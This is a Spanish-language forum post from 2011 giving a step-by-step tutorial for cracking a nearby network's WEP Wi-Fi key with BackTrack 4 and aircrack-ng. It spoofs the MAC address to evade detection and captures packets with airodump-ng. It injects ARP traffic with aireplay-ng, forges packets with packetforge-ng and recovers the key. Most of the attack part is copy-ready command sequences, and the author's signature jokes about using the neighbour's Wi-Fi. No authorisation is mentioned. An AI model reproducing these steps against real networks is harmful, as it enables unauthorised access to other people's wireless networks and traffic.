16 de Octubre de 2017, 09:00:00 pm
  • WPSdb - Base de Datos de Pines Online

Autor Tema: Hacking WEP con BackTrack 4 R2 [USB]  (Leído 5761 veces)

Desconectado D3M0N

  • Founder
  • Usuario
  • *
  • Mensajes: 3.114
  • Reputación: +247/-3
  • El Mate, La Netbook y Wi-Fi del Vecino!
  • awards Usuario con más de 2000 Posts! Miembro registrado desde 2010 Usuario Registrado
    • Arg-Wireless.com.ar
    • Awards
Hacking WEP con BackTrack 4 R2 [USB]
« en: 04 de Marzo de 2011, 07:24:13 pm »

Requerimientos:
+ ISO BackTrack 4 R2 [Descargar desde Aqui]
+ Pendrive de 8 GB [Puede ser de menos pero no les va a entrar los diccionarios.
+ Software adicional.


Bueno primero vamos a prepara nuestro pendrive. Hacemos este tutorial: AQUI

Una ves que terminos nos tendria que quedar asi:


Los diccionarios que agreguemos en el pendrive; en mi caso pesa 2GB, los agregamos dentro de una carpeta:


Adentro:


Maso lo basico... algun tutorial por si no te acordas y los diccionarios.. esto en backtrack lo encontraras en la carpeta de root llamada CD-ROM.


Tutorial

Bueno ahora viene lo bueno, abre una ventana de terminal (o consola) y escribe lo siguiente:

Código: [Seleccionar]
airmon-ng

Aqui te va a decir cual es tu tarjeta inalambrica, lo normal es que salga wlan0, o eth0, o eth1, cosas asi por el estilo, tu te vas a dar cuenta de cual es, en mi caso es la wlan0.

Luego introduce los siguientes comandos:

Código: [Seleccionar]
airmon-ng stop wlan0
ifconfig wlan0 down


Con esto deshabilitas la tarjeta de red inalambrica para hacerle un cambio de mac, este con dos razones importantes: 1. Para que asi no haya problemas de que te puedan detectar e impedirte futuras conexiones y 2. Vas a necesitar el numero de mac mas adelante y esta es una facil de escribir y recordar.

Para cambiar la mac escribe los sigueintes comandos:

Código: [Seleccionar]
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0

Con el primer comando se cambio la mac de tu tarjeta de red por 00:11:22:33:44:55 y con el segundo habilitaste nuevamente tu tarjeta de red inalambrica (puede tardar un poco este ultimo comando)

Ahora vas a proceder a ver las redes inalambricas que estan a tu alcance con el siguiente comando:

Código: [Seleccionar]
airodump-ng wlan0

Va a salir la lista de las redes inalambricas, donde dice el BSSID (mac del router que da la seíñal), PWR (Poder de seíñal), CHN (Canal que se encuentra la red), ENCR (Es el tipo de contraseíña que tiene la red, este tutorial es solo para WEP) y ESSID (Nombre de la red inalambrica).

Se que son mas datos los que se muestran, pero esos no son de importancia, solo vamos a utilizar los que mencione.

Una lista de redes inalambricas puede ser esta que tome:

Cuando selecciones la red inalambrica que vamos a atacar apreta Ctrl + C para parar el proceso y con el mouse sombrea todo el BSSID de esa red y dale click derecho y copiar.

Para explicar bien esta parte vamos a poner un ejemplo:

BSSID                               CHN                   ESSID
66:77:88:99:00:11           6                       ejemplo

Ahora para ponernos de modo monitor (para capturar paquetes) de esa red pon el siguiente comando:

Código: [Seleccionar]
airodump-ng -c 6 -w prueba --bssid 66:77:88:99:00:11 wlan0

Donde:
-c es el numero del canal de la red que estamos atacando
-w es el archivo donde se van a guardar los paquetes que captures (por defecto estan en la direccion /root)
--bssid es la mac del router de la red que estamos atacando
wlan0 es nuestra tarjeta inalambrica

Ahora que ya estas capturando datos veras que hay una parte que dice DATA, estos son los paquetes que llevamos capturados, para poder descifrar una wep es necesario mas de 20,000 paquetes. Te daras cuenta que puede ir muy lento, esto significa que ninguna persona esta utilizando la red entonces no esta generando trafico y te podria llevar dias llegar a los 20,000 paquetes, pero no te preocupes que ahora te enseíñare como generar trafico en la red.

Un ejemplo de lo q tendrias q ver es esto:

Para inyectarle trafico a la red abre otra terminal (consola) donde introduciras los siguientes comandos:

Código: [Seleccionar]
aireplay-ng -1 0 -a 66:77:88:99:00:11 -h 00:11:22:33:44:55 -e ejemplo wlan0

Donde:
-a es el bssid de la red que estamos atacando
-h es la mac falsa que le introducimos a tu tarjeta de red inalambrica
-e es el nombre de la red que estamos atacando [no se requiere]

Luego cuando salgan 4 lineas de codigos y te diga que la conexion esta succesfuld.
Lo que tendrí­as q ver es algo como lo siguiente:

esto significa que estas conectado en capa 2 al router de la red que estamos atacando.

Si por alguna razon no se puede conectar algunas de las razones son las siguientes:
- La red a la que quieres atacar esta muy lejos
- Tu tarjeta de red no puede hacer inyeccion de paquetes
- El router tiene seguridad para evitar este tipo de ataques

Ahora para inyectarle el trafico introducce el siguientes comando:

Código: [Seleccionar]
aireplay-ng -3 -b 66:77:88:99:00:11 -h 00:11:22:33:44:55 wlan0

Donde:
-b es el bssid de la red que estamos atacando
-h es la mac falsa que le introducimos a tu tarjeta de red inalambrica
Veras que que se empezaron a inyectar paquetes, si vas a ver a la otra terminal donde estas capturando los paquetes te daras cuenta que la DATA va caminando muy rí¡pido.

Tendrí­as que ver como avanza el data rí¡pidamente...

Ahora abre otra terminal (consola) e introduce el siguiente comando:

Código: [Seleccionar]
aircrack-ng prueba-01.cap

Donde:
- Prueba-01.cap es el archivo donde se estan capturando los datos

Deja que el comando se ejecute hasta que te diga un mensaje KEY FOUND!!, esto significa que la contraseíña se a descifrado, y te la mostrara al lado derecho de la siguiente forma:

[XX:XX:XX:XX:XX:XX]

Donde las XX son las letras o numeros de la contraseíña, por ejemplo:

Si te muestra [12:34:56:78:90]

La contraseíña para esa red inalambrica seria 1234567890.

Para esta red la contraseíña seria 6362633135.


Bueno para aquellos que quieren probar aqui les pongo todos los comandos en el orden que debe de ser para que solo le den copiar:

FORMA N°1:

Código: [Seleccionar]
airmon-ng
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger –mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
airodump-ng wlan0
airodump-ng -c (numero del canal) -w nombrearchivo –bssid (bssid) wlan0
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
aircrack-ng nombredelarchivo.cap

Como se daran cuenta son pocos comandos pero llevan mucha explicacion y lo trate de hacer de una forma entendible, ya estoy trabajando en el video, asi que no se preocupen si no entienden, pronto voy a sacar el video donde igual voy a explicar los pasos.

Para aquellos que quieren probar otras formas de inyeccion aqui les dejo otras dos formas que me han funcionado perfecto:

FORMA N°2:
Código: [Seleccionar]
aireplay-ng -1 0 -a <bssid> -h <mac> -e <essid> wlan0
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -h (MAC) wlan0
Verificar si el BSSID es el que estamos atacando

FORMA N°3:
Código: [Seleccionar]
aireplay-ng -1 0 -a <bssid> -h <mac> -e <essid> wlan0
aireplay-ng -5 -b <BSSID> -h <mac> wlan0
ver como se llama el archivo .xor
packetforge-ng -0 -a <BSSID> -h <mac> -k 255.255.255.255 -l 255.255.255.255 -y <archivo .xor> -w ARP
aireplay-ng -2 -r ARP wlan0


Cualquier duda me la hacen saber y les tratare de ayudar en lo que pueda.
  • Antenas: Antena Komarov (Prototype), Antena Belgrain (MOD), Antenas 4, 5, 9dBi (omnis)
  • Sistemas Operativos: Microsoft Windows 7 Enterprice (x64), Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Sistemas Operativos que utilizo para Auditar: Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Dispositivos Inalambricos: Alfa AWUS036H 1W (USB); TP-Link TL-WN722N (USB); Ubiquiti Nanostation M2; Mikrotik RB951Ui-2HnD